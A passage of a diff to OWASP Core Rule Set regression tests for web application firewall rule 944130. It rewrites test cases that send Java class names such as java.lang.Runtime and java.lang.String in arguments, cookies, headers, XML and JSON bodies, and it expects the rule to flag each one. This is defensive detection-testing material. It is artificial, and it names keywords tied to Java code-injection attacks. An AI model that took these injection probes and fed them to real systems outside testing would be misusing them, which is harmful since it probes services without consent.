Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-346 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 346 desc: "Request header test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-347 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 347 desc: "XML attribute value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-348 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 348 desc: "XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-349 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 349 desc: "Nested XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-350 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 350 desc: "Content-Type text/plain includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-351 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 351 desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Runtime\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-352 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log: + expect_ids: [944130] + - test_id: 352 desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Runtime\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-353 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 353 desc: "Argument test includes keyword 
java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-354 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 354 desc: "Argument name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-355 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "java.lang.String=test" + output: + log: + expect_ids: [944130] + - test_id: 355 desc: "Cookie test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-356 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 356 desc: "Cookie name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.String=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-357 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 357 desc: "Request header test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-358 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 358 desc: "XML attribute value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - 
log_contains: "id \"944130\"" - - test_title: 944130-359 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 359 desc: "XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-360 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 360 desc: "Nested XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - 
version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-361 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 361 desc: "Content-Type text/plain includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-362 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 362 desc: "Content-Type application/json arg value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.String\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-363 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log: + expect_ids: [944130] + - test_id: 363 desc: "Content-Type application/json arg name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.String\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-364 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 364 desc: "Argument test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-365 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 365 desc: "Argument name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-366 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log: + expect_ids: [944130] + - test_id: 366 desc: "Cookie test 
includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-367 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 367 desc: "Cookie name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.StringBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-368 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 368 desc: "Request header test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-369 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 369 desc: "XML attribute value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-370 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 370 desc: "XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-371 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 371 desc: "Nested XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - 
log_contains: "id \"944130\"" - - test_title: 944130-372 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 372 desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-373 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 373 desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
